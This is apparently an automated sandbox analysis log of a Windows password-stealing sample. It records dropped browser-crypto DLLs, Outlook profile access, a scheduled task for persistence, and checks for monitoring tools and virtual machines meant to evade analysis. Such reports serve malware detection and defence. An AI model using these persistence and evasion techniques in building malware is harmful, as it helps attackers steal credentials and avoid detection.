                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic file information: File size 2453504 > 1048576
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x213c00
                        Source: Binary string: mozglue.pdbP source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                        Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                        Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                        Source: Binary string: nss3.pdb@ source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                        Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
                        Source: Binary string: nss3.pdb source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                        Source: Binary string: mozglue.pdb source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                        Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

                        Data Obfuscation

                        barindex
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeUnpacked PE file: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe.de0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeUnpacked PE file: 5.2.BGIIDAEBGC.exe.4b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 8.2.explorti.exe.7c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeUnpacked PE file: 11.2.a37ec701f3.exe.120000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 12.2.explorti.exe.7c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 14.2.explorti.exe.7c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 15.2.explorti.exe.7c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 16.2.explorti.exe.7c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW;
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C52C410 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_6C52C410
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .data
                        Source: explorti.exe.5.drStatic PE information: real checksum: 0x1cc5aa should be: 0x1ceabc
                        Source: random[1].exe.8.drStatic PE information: real checksum: 0x0 should be: 0x258a45
                        Source: a37ec701f3.exe.8.drStatic PE information: real checksum: 0x0 should be: 0x258a45
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: real checksum: 0x0 should be: 0x258a45
                        Source: BGIIDAEBGC.exe.0.drStatic PE information: real checksum: 0x1cc5aa should be: 0x1ceabc
                        Source: amadka[1].exe.0.drStatic PE information: real checksum: 0x1cc5aa should be: 0x1ceabc
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: section name:
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: section name:
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: section name:
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: section name:
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: section name:
                        Source: nss3.dll.0.drStatic PE information: section name: .00cfg
                        Source: nss3[1].dll.0.drStatic PE information: section name: .00cfg
                        Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
                        Source: softokn3[1].dll.0.drStatic PE information: section name: .00cfg
                        Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
                        Source: freebl3[1].dll.0.drStatic PE information: section name: .00cfg
                        Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
                        Source: mozglue[1].dll.0.drStatic PE information: section name: .00cfg
                        Source: msvcp140.dll.0.drStatic PE information: section name: .didat
                        Source: msvcp140[1].dll.0.drStatic PE information: section name: .didat
                        Source: BGIIDAEBGC.exe.0.drStatic PE information: section name:
                        Source: BGIIDAEBGC.exe.0.drStatic PE information: section name: .idata
                        Source: BGIIDAEBGC.exe.0.drStatic PE information: section name:
                        Source: BGIIDAEBGC.exe.0.drStatic PE information: section name: vtxoxanz
                        Source: BGIIDAEBGC.exe.0.drStatic PE information: section name: wrlrcnfl
                        Source: BGIIDAEBGC.exe.0.drStatic PE information: section name: .taggant
                        Source: amadka[1].exe.0.drStatic PE information: section name:
                        Source: amadka[1].exe.0.drStatic PE information: section name: .idata
                        Source: amadka[1].exe.0.drStatic PE information: section name:
                        Source: amadka[1].exe.0.drStatic PE information: section name: vtxoxanz
                        Source: amadka[1].exe.0.drStatic PE information: section name: wrlrcnfl
                        Source: amadka[1].exe.0.drStatic PE information: section name: .taggant
                        Source: explorti.exe.5.drStatic PE information: section name:
                        Source: explorti.exe.5.drStatic PE information: section name: .idata
                        Source: explorti.exe.5.drStatic PE information: section name:
                        Source: explorti.exe.5.drStatic PE information: section name: vtxoxanz
                        Source: explorti.exe.5.drStatic PE information: section name: wrlrcnfl
                        Source: explorti.exe.5.drStatic PE information: section name: .taggant
                        Source: random[1].exe.8.drStatic PE information: section name:
                        Source: random[1].exe.8.drStatic PE information: section name:
                        Source: random[1].exe.8.drStatic PE information: section name:
                        Source: random[1].exe.8.drStatic PE information: section name:
                        Source: random[1].exe.8.drStatic PE information: section name:
                        Source: a37ec701f3.exe.8.drStatic PE information: section name:
                        Source: a37ec701f3.exe.8.drStatic PE information: section name:
                        Source: a37ec701f3.exe.8.drStatic PE information: section name:
                        Source: a37ec701f3.exe.8.drStatic PE information: section name:
                        Source: a37ec701f3.exe.8.drStatic PE information: section name:
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4FB536 push ecx; ret 0_2_6C4FB549
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 8_2_007DD82C push ecx; ret 8_2_007DD83F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F772B70 push 7F770002h; ret 11_2_7F772B7F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F772870 push 7F770002h; ret 11_2_7F77287F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F770D70 push 7F770002h; ret 11_2_7F770D7F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F771070 push 7F770002h; ret 11_2_7F77107F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F771370 push 7F770002h; ret 11_2_7F77137F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F771670 push 7F770002h; ret 11_2_7F77167F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F771970 push 7F770002h; ret 11_2_7F77197F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F771C70 push 7F770002h; ret 11_2_7F771C7F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F771F70 push 7F770002h; ret 11_2_7F771F7F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F772270 push 7F770002h; ret 11_2_7F77227F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F772570 push 7F770002h; ret 11_2_7F77257F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F770B79 push ebx; mov dword ptr [esp], edx11_2_7F7709F1
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F770B79 push edi; mov dword ptr [esp], eax11_2_7F770A89
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F770B79 push eax; mov dword ptr [esp], edi11_2_7F770B7F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F772C60 push 7F770002h; ret 11_2_7F772C6F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F772960 push 7F770002h; ret 11_2_7F77296F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F770E60 push 7F770002h; ret 11_2_7F770E6F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F771160 push 7F770002h; ret 11_2_7F77116F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F771460 push 7F770002h; ret 11_2_7F77146F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F771760 push 7F770002h; ret 11_2_7F77176F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F771A60 push 7F770002h; ret 11_2_7F771A6F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F771D60 push 7F770002h; ret 11_2_7F771D6F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F772060 push 7F770002h; ret 11_2_7F77206F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F772360 push 7F770002h; ret 11_2_7F77236F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F772660 push 7F770002h; ret 11_2_7F77266F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F772A50 push 7F770002h; ret 11_2_7F772A5F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F770F50 push 7F770002h; ret 11_2_7F770F5F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F771250 push 7F770002h; ret 11_2_7F77125F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F771550 push 7F770002h; ret 11_2_7F77155F
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: section name: entropy: 7.996079938920401
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: section name: entropy: 7.982865889891432
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: section name: entropy: 7.955332931380237
                        Source: BGIIDAEBGC.exe.0.drStatic PE information: section name: entropy: 7.97686822231914
                        Source: BGIIDAEBGC.exe.0.drStatic PE information: section name: vtxoxanz entropy: 7.953860739079147
                        Source: amadka[1].exe.0.drStatic PE information: section name: entropy: 7.97686822231914
                        Source: amadka[1].exe.0.drStatic PE information: section name: vtxoxanz entropy: 7.953860739079147
                        Source: explorti.exe.5.drStatic PE information: section name: entropy: 7.97686822231914
                        Source: explorti.exe.5.drStatic PE information: section name: vtxoxanz entropy: 7.953860739079147
                        Source: random[1].exe.8.drStatic PE information: section name: entropy: 7.996079938920401
                        Source: random[1].exe.8.drStatic PE information: section name: entropy: 7.982865889891432
                        Source: random[1].exe.8.drStatic PE information: section name: entropy: 7.955332931380237
                        Source: a37ec701f3.exe.8.drStatic PE information: section name: entropy: 7.996079938920401
                        Source: a37ec701f3.exe.8.drStatic PE information: section name: entropy: 7.982865889891432
                        Source: a37ec701f3.exe.8.drStatic PE information: section name: entropy: 7.955332931380237
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeFile created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile created: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C5255F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_6C5255F0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
